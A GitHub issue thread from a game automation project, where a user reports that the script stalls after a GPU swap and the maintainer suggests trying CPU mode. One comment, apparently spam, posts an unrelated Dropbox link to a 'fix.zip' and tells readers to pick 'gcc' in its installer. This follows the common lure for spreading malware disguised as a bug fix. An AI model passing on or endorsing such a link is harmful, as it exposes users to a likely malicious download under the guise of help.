### ISSUE TITLE
[Bug]: 更换显卡后，运行脚本初始刷完成后无法正常开始刷空洞

### ISSUE THREAD

**Issue by ghosthands** [sMythicalBird/ZenlessZoneZero-Auto#214]
### 请确保您已经阅读并同意以下要求

- [X] 我已阅读项目使用说明，并且按照要求更改了游戏配置
- [X] 我已经搜索过已有的[issue](https://github.com/sMythicalBird/ZenlessZoneZero-Auto/issues)，确认当前问题没有被提出过
- [X] 我已经知晓并同意，若由于个人未按要求配置导致的问题，将不会被处理
- [X] 我已经知晓并同意，若该问题与程序无关，将不会被处理

### 项目版本

v2.3.1

### 系统版本

Windows 10

### bug情况描述

将显卡从 GTX 1063 更换为 GTX 970（共用驱动因此未对驱动做任何处理）后，用一键start，GPU模式，选择3运行脚本+1零号空洞，到“添加页面：战斗中”条目后再无任何动静，重新下载源码并配置后依旧，请问这会哪里出了问题呢？谢谢

### 上传截图

![QQ截图20240826090434](https://github.com/user-attachments/assets/14952980-75db-4c53-b18a-3e075f58941e)
![QQ截图20240826091553](https://github.com/user-attachments/assets/9953e5eb-1c3d-40fc-ba48-1821bd117af8)

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by sMythicalBird** [comment]
换cpu看看，10系以下的显卡可能太老了不支持
